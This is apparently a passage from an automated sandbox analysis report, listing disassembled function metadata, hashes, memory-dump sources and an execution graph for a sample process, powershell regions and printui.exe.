                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 2168557111-2187435201
                              • Opcode ID: ec32571c523adde9876c25a5250147644bd8fbc62768072efef6677115d3144c
                              • Instruction ID: cd2b2211ba2f092ff2f78387649d6d8996e39ad4a62d1acbd15bf7f05d32a07f
                              • Opcode Fuzzy Hash: ec32571c523adde9876c25a5250147644bd8fbc62768072efef6677115d3144c
                              • Instruction Fuzzy Hash: 06F06253808E8881D2519F1CA8001FBB374FF9E789F645326EB8D36564DF28DA839750
                              Function 00007FF733A9CAF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733A9CA88
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 2168557111-4064033741
                              • Opcode ID: 3ef780b1d1839701e605c9d6f1aac61546fe2ee70ed31451e5d70c310a7f9610
                              • Instruction ID: d277b21f9bf39bbb592ac26293020bbff233a8d77e7b80d7d4f06037a8c9c925
                              • Opcode Fuzzy Hash: 3ef780b1d1839701e605c9d6f1aac61546fe2ee70ed31451e5d70c310a7f9610
                              • Instruction Fuzzy Hash: 0DF06253808E8481D2529F1CA8001BBB374FF9E789F645326EB8D36564DF28EA839750
                              Function 00007FF733A9CAE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733A9CA88
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 2168557111-4283191376
                              • Opcode ID: f9021375352f87982f44936b318672e8326324174f1a46be6cf74cf883c0e9b3
                              • Instruction ID: 2b837c9c26e8b04b2669a13f0e03720a8d6688aa60afd60cc6eb8646f0a87eca
                              • Opcode Fuzzy Hash: f9021375352f87982f44936b318672e8326324174f1a46be6cf74cf883c0e9b3
                              • Instruction Fuzzy Hash: F0F06253808E8481D2519F1CA8001BBB374FF9E789F645326EB8D36564DF28DA839750
                              Function 00007FF733A9CA68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733A9CA88
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func__stdio_common_vfprintf
                              • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                              • API String ID: 2168557111-2468659920
                              • Opcode ID: f0a9ad2d0332f4a0cb17f1a949aa09216699c128d3de2115c1f52911c03d88e2
                              • Instruction ID: ced774a816fc3384f4afbc204d0f3b064a840c22fb7b58fd2df816b810de24ee
                              • Opcode Fuzzy Hash: f0a9ad2d0332f4a0cb17f1a949aa09216699c128d3de2115c1f52911c03d88e2
                              • Instruction Fuzzy Hash: F9F06253814E8481D2519F18A8001ABB364FF5E789F545326EF8C3A124DF28D5839740
                              Function 00007FF733A9DCB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID: CCG $vector::_M_default_append
                              • API String ID: 3997070919-1783307541
                              • Opcode ID: 026b4dc745698a309290ea799ce74f05bbdf94dca8cd5df2bedad55d9e838809
                              • Instruction ID: 1d4dccf938aa4be3f1c10438eec1076f5f01d47b91998c0c292a19cc7ff768eb
                              • Opcode Fuzzy Hash: 026b4dc745698a309290ea799ce74f05bbdf94dca8cd5df2bedad55d9e838809
                              • Instruction Fuzzy Hash: A6D02BA2F2404083F79457EAF8007765013DB8C7C2F80D035ED4987788CE2DC0504700
                              Function 00007FF733AA78B0 Relevance: 5.1, APIs: 4, Instructions: 81COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              • Opcode ID: 58f3ca7d45319ce85b6ae0a324161abf8efb057a3228ce1c3e5c58b2b16bfafb
                              • Instruction ID: 7ed92485baab29e0b6ac986233bcc50e21dddd41e076e5ae757517d7aa91ff9e
                              • Opcode Fuzzy Hash: 58f3ca7d45319ce85b6ae0a324161abf8efb057a3228ce1c3e5c58b2b16bfafb
                              • Instruction Fuzzy Hash: 3631BD73B0860196F7E19F79E400A69A390EB44BA9F884231EE3D573D4DF39D885D790
                              Function 00007FF733AA7780 Relevance: 5.1, APIs: 4, Instructions: 78COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              • Opcode ID: 614883fd7a030beffaa11c44c8852e6b5631745354ed4ea8a6300d43ad5024aa
                              • Instruction ID: 0194b8c7ac6d54c6fb79a0322248b5e10fa16f5dc3d4d3dc7ae7dcfe2220351c
                              • Opcode Fuzzy Hash: 614883fd7a030beffaa11c44c8852e6b5631745354ed4ea8a6300d43ad5024aa
                              • Instruction Fuzzy Hash: B631BB33B092019BEBA4EF74D80066A6390EF44B69F884131ED2D573D4DF39E885D790
                              Function 00007FF733AA7530 Relevance: 5.1, APIs: 4, Instructions: 52COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32(?,00007FF8C88707E0,?,?,00007FF733AA7A8C,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF733AA7556
                              • LeaveCriticalSection.KERNEL32(?,00007FF733AA7A8C,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF733AA757B
                              • EnterCriticalSection.KERNEL32(?,00007FF733AA7A8C,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF733AA75AB
                              • LeaveCriticalSection.KERNEL32(?,00007FF733AA7A8C,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF733AA75B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              • Opcode ID: 05cf148eaff5b458fdc66140d41b2371e84815f50553518cfb9d83f69e7b01f1
                              • Instruction ID: 7699066c6284dbd9a754a9b099a462e54d789d9b34a954b69b5df54c263cafe0
                              • Opcode Fuzzy Hash: 05cf148eaff5b458fdc66140d41b2371e84815f50553518cfb9d83f69e7b01f1
                              • Instruction Fuzzy Hash: 6401D423B0954265E676EB276C00A6B9350BFD8BE5F890031FD1E17360DD3DD882A390

                              Executed Functions

                              Function 00007FF848B23EA5 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.3365341701.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff848b20000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62a5005cc35cbd3f10fe2cbca50f20a54ab05e5189c360413cbfad278de9fe08
                              • Instruction ID: d56c274268d087b1041b9a6f1a38ed246f37798f57a8e7e9fa79e6b7e9e7f514
                              • Opcode Fuzzy Hash: 62a5005cc35cbd3f10fe2cbca50f20a54ab05e5189c360413cbfad278de9fe08
                              • Instruction Fuzzy Hash: AB012431A0EB895FEB55FA6C54955B9BBE2FF58350F5801BEC04CD7453CA1898088396
                              Function 00007FF848A537B5 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.3364978326.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff848a50000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                              • Instruction ID: 99a0129e18c5838796c7d9a4b9a5ab91b74f996e963cf38b436585ac4b0f2840
                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                              • Instruction Fuzzy Hash: 5D01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB46
                              Function 00007FF848B23ED2 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.3365341701.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff848b20000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a874d0c0062bab9e00a960c8996ce924182ad3d8b90276c4be262bc00de2c758
                              • Instruction ID: 3d5b3552d360f0aad19c8b7154a82a10172a58cbf26e9c2ae1f884b394ee78a5
                              • Opcode Fuzzy Hash: a874d0c0062bab9e00a960c8996ce924182ad3d8b90276c4be262bc00de2c758
                              • Instruction Fuzzy Hash: 68F0E232A0F6885FEB55E66C50981E8BBE0EF48360F1400BFC04CD3153DA29084583A1

                              Non-executed Functions

                              Function 00007FF7636910E0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 195registrylibrarymemoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.3325239110.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 00000008.00000002.3325221504.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000008.00000002.3325268158.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                              • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                              • API String ID: 2613610799-4035671587
                              • Opcode ID: 456eba1b0848363f44b5dc1ad55adb208842debec6c41e3cfc997a71327bd480
                              • Instruction ID: e8b49fab149d8028492fd44ccbb0f98a849c12c308ebc19bb0040d1e9e9cb062
                              • Opcode Fuzzy Hash: 456eba1b0848363f44b5dc1ad55adb208842debec6c41e3cfc997a71327bd480
                              • Instruction Fuzzy Hash: D4A16D32A18A46CAFB50AB50E4443BDBBA5FB4DB89F814171DA0E27B94CF3CD845C760
                              Function 00007FF763691570 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.3325239110.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 00000008.00000002.3325221504.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000008.00000002.3325268158.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                              • String ID:
                              • API String ID: 642454821-0
                              • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                              • Instruction ID: 3fee72755c71ea6d3962e121ea806243af401c68a42ccf28a2ab0bc38d0a31e0
                              • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                              • Instruction Fuzzy Hash: 53612A35E09607C2FBA0AB11E940279B3AABB48780FA541B5DA4DA73D4DF3CED51C760
                              Function 00007FF763691A54 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.3325239110.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 00000008.00000002.3325221504.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000008.00000002.3325268158.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                              • Instruction ID: efcf28e4a50df4f0eeb75178bc7a4dc8ff76e4d23acfde056e8a47e071ba55c0
                              • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                              • Instruction Fuzzy Hash: 3D114D22A05B46CAEB40EF60EC4426873A5FB08758F800A71EB6D57BA4EF7CD964C350

                              Execution Graph

                              Execution Coverage:28%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:73
                              Total number of Limit Nodes:4
                              execution_graph 187 7ff763691570 GetStartupInfoW 188 7ff7636915af 187->188 189 7ff7636915c1 188->189 190 7ff7636915ca Sleep 188->190 191 7ff7636915e6 _amsg_exit 189->191 193 7ff7636915f4 189->193 190->188 191->193 192 7ff76369166a _initterm 194 7ff763691687 _IsNonwritableInCurrentImage 192->194 193->192 193->194 199 7ff76369164b 193->199 194->199 201 7ff7636910e0 HeapSetInformation 194->201 197 7ff763691750 197->199 200 7ff763691759 _cexit 197->200 198 7ff763691748 exit 198->197 200->199 202 7ff763691d26 201->202 203 7ff76369112c LoadCursorW GetStockObject RegisterClassW CreateWindowExW RegCreateKeyExW 202->203 204 7ff7636912c4 GetLastError 203->204 205 7ff763691219 RegQueryValueExW 203->205 207 7ff7636912d0 LoadLibraryW 204->207 206 7ff763691252 205->206 208 7ff763691267 RegDeleteValueW 206->208 209 7ff763691258 206->209 210 7ff76369127e RegSetValueExW 206->210 211 7ff7636912fb GetProcAddress 207->211 212 7ff7636912eb GetLastError 207->212 208->209 209->210 213 7ff7636912b2 RegCloseKey 209->213 210->213 215 7ff763691327 GetCommandLineW 211->215 216 7ff763691319 GetLastError 211->216 214 7ff763691361 RegOpenKeyExW 212->214 213->207 217 7ff763691394 RegQueryValueExW RegCloseKey RegDeleteKeyExW 214->217 218 7ff7636913f9 GetLastError 214->218 225 7ff763691008 215->225 219 7ff763691350 FreeLibrary 216->219 222 7ff763691405 217->222 218->222 219->214 223 7ff763691419 222->223 224 7ff76369140a DestroyWindow 222->224 223->197 223->198 224->223 226 7ff763691020 225->226 227 7ff7636910ca 225->227 228 7ff763691028 iswspace 226->228 229 7ff76369103e 226->229 227->219 228->226 228->229 229->227 230 7ff763691087 iswspace 229->230 232 7ff763691051 229->232 230->229 230->232 231 7ff7636910b4 iswspace 231->227 231->232 232->227 232->231 233 7ff763691520 __wgetmainargs 234 7ff763691d50 _XcptFilter 235 7ff763691810 236 7ff763691819 235->236 237 7ff763691824 236->237 238 7ff763691ba0 RtlCaptureContext RtlLookupFunctionEntry 236->238 239 7ff763691be5 RtlVirtualUnwind 238->239 240 7ff763691c27 238->240 239->240 243 7ff763691b5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 240->243 244 7ff763691880 SetUnhandledExceptionFilter 245 7ff763691840 246 7ff76369184f 245->246 247 7ff763691872 245->247 246->247 248 7ff76369186b ?terminate@ 246->248 248->247 249 7ff763691440 252 7ff763691452 249->252 251 7ff7636914b9 __set_app_type 253 7ff7636914f6 251->253 256 7ff763691908 GetModuleHandleW 252->256 254 7ff7636914ff __setusermatherr 253->254 255 7ff76369150c 253->255 254->255 257 7ff76369191d 256->257 257->251 258 7ff7636917e0 261 7ff763691a54 258->261 262 7ff763691a80 6 API calls 261->262 263 7ff7636917e9 261->263 262->263 264 7ff763691789 265 7ff7636917a1 264->265 266 7ff763691798 _exit 264->266 267 7ff7636917b6 265->267 268 7ff7636917aa _cexit 265->268 266->265 268->267

                              Callgraph

                              Executed Functions

                              Function 00007FF7636910E0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 195registrylibrarymemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3427166602.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 0000000B.00000002.3427131865.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427235962.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                              • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                              • API String ID: 2613610799-4035671587
                              • Opcode ID: 01dbd4a29999466c0cbcc4235f3cd163bce813dc705ca9da2bad2025714d8e66
                              • Instruction ID: e8b49fab149d8028492fd44ccbb0f98a849c12c308ebc19bb0040d1e9e9cb062
                              • Opcode Fuzzy Hash: 01dbd4a29999466c0cbcc4235f3cd163bce813dc705ca9da2bad2025714d8e66
                              • Instruction Fuzzy Hash: D4A16D32A18A46CAFB50AB50E4443BDBBA5FB4DB89F814171DA0E27B94CF3CD845C760
                              Function 00007FF763691570 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 27 7ff763691570-7ff7636915ac GetStartupInfoW 28 7ff7636915af-7ff7636915ba 27->28 29 7ff7636915d7 28->29 30 7ff7636915bc-7ff7636915bf 28->30 33 7ff7636915dc-7ff7636915e4 29->33 31 7ff7636915c1-7ff7636915c8 30->31 32 7ff7636915ca-7ff7636915d5 Sleep 30->32 31->33 32->28 34 7ff7636915f4-7ff7636915fc 33->34 35 7ff7636915e6-7ff7636915f2 _amsg_exit 33->35 37 7ff763691655 34->37 38 7ff7636915fe-7ff76369161a 34->38 36 7ff763691660-7ff763691668 35->36 40 7ff763691687-7ff763691689 36->40 41 7ff76369166a-7ff76369167d _initterm 36->41 39 7ff76369165b 37->39 42 7ff76369161e-7ff763691621 38->42 39->36 45 7ff763691695-7ff76369169c 40->45 46 7ff76369168b-7ff76369168e 40->46 41->40 43 7ff763691623-7ff763691625 42->43 44 7ff763691647-7ff763691649 42->44 47 7ff763691627-7ff76369162a 43->47 48 7ff76369164b-7ff763691650 43->48 44->39 44->48 49 7ff7636916c8-7ff7636916d5 45->49 50 7ff76369169e-7ff7636916ac call 7ff7636919c0 45->50 46->45 52 7ff76369163c-7ff763691645 47->52 53 7ff76369162c-7ff763691638 47->53 56 7ff7636917b6-7ff7636917d3 48->56 54 7ff7636916e1-7ff7636916e6 49->54 55 7ff7636916d7-7ff7636916dc 49->55 50->49 59 7ff7636916ae-7ff7636916be 50->59 52->42 53->52 58 7ff7636916ea-7ff7636916f1 54->58 55->56 61 7ff7636916f3-7ff7636916f6 58->61 62 7ff763691767-7ff76369176b 58->62 59->49 65 7ff7636916f8-7ff7636916fa 61->65 66 7ff7636916fc-7ff763691702 61->66 63 7ff76369177b-7ff763691784 62->63 64 7ff76369176d-7ff763691777 62->64 63->56 63->58 64->63 65->62 65->66 67 7ff763691712-7ff763691734 call 7ff7636910e0 66->67 68 7ff763691704-7ff763691710 66->68 70 7ff763691739-7ff763691746 67->70 68->66 71 7ff763691750-7ff763691757 70->71 72 7ff763691748-7ff76369174a exit 70->72 73 7ff763691765 71->73 74 7ff763691759-7ff76369175f _cexit 71->74 72->71 73->56 74->73
                              APIs
                              Memory Dump Source
